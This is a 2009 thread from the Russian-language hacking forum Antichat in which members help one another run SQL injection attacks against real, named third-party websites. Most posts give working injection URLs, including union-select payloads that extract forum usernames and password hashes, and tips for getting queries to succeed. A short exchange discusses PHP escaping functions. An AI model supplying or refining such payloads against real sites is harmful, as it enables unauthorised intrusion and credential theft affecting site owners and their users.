ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.01.2009, 22:19
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
americanbible.org/absport/news/item.php?id=181'
При подборе вообще не реагирует. в чем дело?
http://www.americanbible.org/absport/news/item.php?id=181'/**/and/**/if(4=substring(version(),1,1),(select/**/1/**/from/**/ABS_shortcutURLs),1)/*
|
|
|
01.02.2009, 00:31
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--
Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая
|
|
|
|
01.02.2009, 00:43
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от diznt
teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--
Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая
Да таблица существует в этой базе данных, но она пустая. Оттуда нечего брать.
|
|
|
|
01.02.2009, 00:48
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Для cpg_users table_schema=KOLESHEV_1
но
http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+
command denied to user ..
зато можешь посмотреть юзеров форума
http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_ password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+ from+phpbb_users+limit+1,1+--+
|
|
|
|
01.02.2009, 00:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
diznt, проверь table_schema. То есть таблица может находится в другой ДБ, то есть имя таблицы будет писаться так. [table_schema].[имя таблица]
Последний раз редактировалось Tigger; 01.02.2009 в 00:58..
|
|
|
|
01.02.2009, 00:47
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
|
|
|
|
01.02.2009, 02:09
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Qam
Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()
|
|
|
|
01.02.2009, 04:56
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от [Raz0r]
Используй mysql_(real_)*escape_string()
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то
mysql_real_escape_string() вызывает библиотечную функцмю MySQL mysql_real_escape_string, которая добавляет обратную косую черту к следующим символам: \x00, \n, \r, \, ', " and \x1a.
то есть например
$sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1";
все равно уязвим.
Последний раз редактировалось AkyHa_MaTaTa; 01.02.2009 в 19:53..
|
|
|
|
01.02.2009, 00:50
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
|
|
|
|
01.02.2009, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от diznt
ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1092324){kind=avatar}
Похожие темы
Комбинированный вид
